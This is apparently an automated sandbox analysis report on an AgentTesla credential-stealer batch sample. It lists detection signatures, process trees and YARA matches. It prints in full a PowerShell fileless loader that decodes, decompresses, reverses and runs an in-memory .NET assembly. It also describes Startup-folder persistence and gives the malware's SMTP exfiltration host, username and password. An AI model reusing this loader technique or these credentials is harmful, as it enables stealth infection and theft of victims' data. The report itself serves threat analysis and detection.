Edit tour
Windows
Analysis Report
87M9Y3P4Z7.bat
Overview
General Information
Sample name: | 87M9Y3P4Z7.batrenamed because original name is a hash value |
Original sample name: | 5be496e81c311cc8c78b7d6422fb51e4b4fc3e332ef54eae2bc6495dac60acc7.bat |
Analysis ID: | 1545585 |
MD5: | 0403cb08cd9a055952e1153dfd5a2e0e |
SHA1: | b42d3e9e49a30671d54217268ae15e6c23b0f226 |
SHA256: | 5be496e81c311cc8c78b7d6422fb51e4b4fc3e332ef54eae2bc6495dac60acc7 |
Tags: | AgentTeslabatuser-NDA0E |
Infos: | |
Detection
AgentTesla
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops VBS files to the startup folder
Found large BAT file
Installs a global keyboard hook
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 5448 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\87M9Y 3P4Z7.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6568 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 5368 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - cmd.exe (PID: 5492 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - xcopy.exe (PID: 6968 cmdline:
xcopy /d / q /y /h /i C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe C :\Users\us er\Desktop \87M9Y3P4Z 7.bat.Zhe MD5: 39FBFD3AF58238C6F9D4D408C9251FF5) - attrib.exe (PID: 6516 cmdline:
attrib +s +h C:\User s\user\Des ktop\87M9Y 3P4Z7.bat. Zhe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - 87M9Y3P4Z7.bat.Zhe (PID: 5128 cmdline:
C:\Users\u ser\Deskto p\87M9Y3P4 Z7.bat.Zhe -WindowSt yle hidden -command "$Onnkl = get-conten t 'C:\User s\user\Des ktop\87M9Y 3P4Z7.bat' | Select- Object -La st 1; $Mdq ytced = [S ystem.Conv ert]::From Base64Stri ng($Onnkl) ;$Ktdhxz = New-Objec t System.I O.MemorySt ream( , $M dqytced ); $Mcldrihy = New-Obje ct System. IO.MemoryS tream;$Plc ywucshy = New-Object System.IO .Compressi on.GzipStr eam $Ktdhx z, ([IO.Co mpression. Compressio nMode]::De compress); $Plcywucsh y.CopyTo( $Mcldrihy );$Plcywuc shy.Close( );$Ktdhxz. Close();[b yte[]] $Md qytced = $ Mcldrihy.T oArray();[ Array]::Re verse($Mdq ytced); $M xpzv = [Sy stem.AppDo main]::Cur rentDomain .Load($Mdq ytced); $Y lvhvbxsq = $Mxpzv.En tryPoint; $Ylvhvbxsq .Declaring Type.Invok eMember($Y lvhvbxsq.N ame, [Syst em.Reflect ion.Bindin gFlags]::I nvokeMetho d, $null, $null, $nu ll)| Out-N ull" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - InstallUtil.exe (PID: 6196 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- wscript.exe (PID: 5632 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\Micro soft\Windo ws\Start M enu\Progra ms\Startup \ChannelUr is.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6968 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Roami ng\Channel Uris.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3184 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - chcp.com (PID: 2100 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - cmd.exe (PID: 6480 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho F " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - xcopy.exe (PID: 2420 cmdline:
xcopy /d / q /y /h /i C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe C :\Users\us er\AppData \Roaming\C hannelUris .bat.Zhe MD5: 39FBFD3AF58238C6F9D4D408C9251FF5) - attrib.exe (PID: 2656 cmdline:
attrib +s +h C:\User s\user\App Data\Roami ng\Channel Uris.bat.Z he MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - ChannelUris.bat.Zhe (PID: 4892 cmdline:
C:\Users\u ser\AppDat a\Roaming\ ChannelUri s.bat.Zhe -WindowSty le hidden -command " $Onnkl = g et-content 'C:\Users \user\AppD ata\Roamin g\ChannelU ris.bat' | Select-Ob ject -Last 1; $Mdqyt ced = [Sys tem.Conver t]::FromBa se64String ($Onnkl);$ Ktdhxz = N ew-Object System.IO. MemoryStre am( , $Mdq ytced );$M cldrihy = New-Object System.IO .MemoryStr eam;$Plcyw ucshy = Ne w-Object S ystem.IO.C ompression .GzipStrea m $Ktdhxz, ([IO.Comp ression.Co mpressionM ode]::Deco mpress);$P lcywucshy. CopyTo( $M cldrihy ); $Plcywucsh y.Close(); $Ktdhxz.Cl ose();[byt e[]] $Mdqy tced = $Mc ldrihy.ToA rray();[Ar ray]::Reve rse($Mdqyt ced); $Mxp zv = [Syst em.AppDoma in]::Curre ntDomain.L oad($Mdqyt ced); $Ylv hvbxsq = $ Mxpzv.Entr yPoint; $Y lvhvbxsq.D eclaringTy pe.InvokeM ember($Ylv hvbxsq.Nam e, [System .Reflectio n.BindingF lags]::Inv okeMethod, $null, $n ull, $null )| Out-Nul l" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - InstallUtil.exe (PID: 5092 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
Click to see the 32 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 20 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |